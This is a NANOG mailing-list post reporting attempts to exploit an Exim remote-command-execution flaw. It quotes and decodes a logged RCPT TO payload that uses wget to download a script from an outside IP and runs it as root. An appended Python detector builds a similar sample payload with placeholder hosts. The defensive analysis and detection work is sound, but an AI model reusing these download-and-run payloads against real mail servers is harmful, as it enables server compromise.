nanog mailing list archives
Re: Russian Anal Probing + Malware
From: Andy Smith <andy () strugglers net>
Date: Sun, 23 Jun 2019 04:04:13 +0000
Hello,

On Sat, Jun 22, 2019 at 11:01:13AM -0600, Keith Medcalf wrote:
> What malware slinging?

Some user there is trying to exploit CVE-2018-10149:

2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22}}@myhostname>" H=(myhostname) [89.248.171.57] next input="QUIT\n"

Plus another 17 attempts by that IP through to 19 June.

$ printf "\x2fbin\x2fsh\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2eyyearz\x20\x26\x26\x20sh\x20\x2froot\x2f\x2eyyearz\x20\x2dn\x20\x26\x22\n"
/bin/sh -c "wget --no-check-certificate -T 36 hxxps://185.162.235.211/ldm1ip -O /root/.yyearz && sh /root/.yyearz -n &"

(I replaced https with hxxps to prevent auto-link-followers from hitting the site.)

Cheers,
Andy
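The decoding Andy did by hand with printf can be run over a whole Exim mainlog. The script below is an added example, not part of the thread: it flags rejected RCPT TO addresses that carry a ${run{...}} expansion attempt, decodes the \xNN escapes, and reports the peer IP. The sample log lines, the 192.0.2.10 / 198.51.100.7 addresses and the example.invalid hosts are constructed placeholders.

```python
import re

# Exim logs a rejected RCPT TO verbatim. A CVE-2018-10149 probe shows up as a
# local-part of the form  bin+${run{...}}@host  where the shell command inside
# ${run{}} is written with \xNN escapes (\x2f is "/", \x20 is a space).
RUN_EXPANSION = re.compile(r'\$\{run\{(?P<body>.*?)\}\}')
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')
PEER_IP = re.compile(r'\[(\d{1,3}(?:\.\d{1,3}){3})\]')


def decode_exim_escapes(text: str) -> str:
    """Replace every \\xNN sequence with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def find_run_expansion(log_line: str):
    """Return (peer_ip, decoded_command) for a line carrying a ${run{...}}
    expansion attempt, or None for any other line."""
    m = RUN_EXPANSION.search(log_line)
    if m is None:
        return None
    ip = PEER_IP.search(log_line)
    return (ip.group(1) if ip else None, decode_exim_escapes(m.group('body')))


def scan(lines):
    """Yield (line_no, peer_ip, command) for every hit in an iterable of lines."""
    for n, line in enumerate(lines, 1):
        hit = find_run_expansion(line)
        if hit:
            yield (n, hit[0], hit[1])


# --- constructed sample data (placeholder IPs/hosts, not from a real log) ---
def exim_hex_escape(cmd: str) -> str:
    """Write non-alphanumeric characters as \\xNN, as the probe in the log does."""
    return ''.join(c if c.isalnum() else '\\x%02x' % ord(c) for c in cmd)

SAMPLE_CMD = '/bin/sh -c "wget -T 36 https://192.0.2.10/stage1 -O /tmp/.x && sh /tmp/.x &"'
SAMPLE_LOG = [
    '2019-06-11 11:28:35 SMTP protocol synchronization error (next input sent '
    'too soon: pipelining was not advertised): rejected "RCPT TO:<bin+${run{'
    + exim_hex_escape(SAMPLE_CMD) + '}}@mx.example.invalid>" H=(mx.example.invalid) '
    '[192.0.2.10] next input="QUIT\\n"',
    '2019-06-11 11:30:02 1hbYnR-0003Ab-2Q <= alice@example.invalid '
    'H=mail.example.invalid [198.51.100.7] P=esmtp S=1234',
]

if __name__ == '__main__':
    for n, ip, cmd in scan(SAMPLE_LOG):
        print(f'line {n}: ${{run{{}}}} expansion attempt from {ip}: {cmd}')
```

Pointed at a real mainlog (`scan(open('/var/log/exim4/mainlog'))`), each hit gives the peer address to block and the decoded download-and-run command to check against outbound traffic.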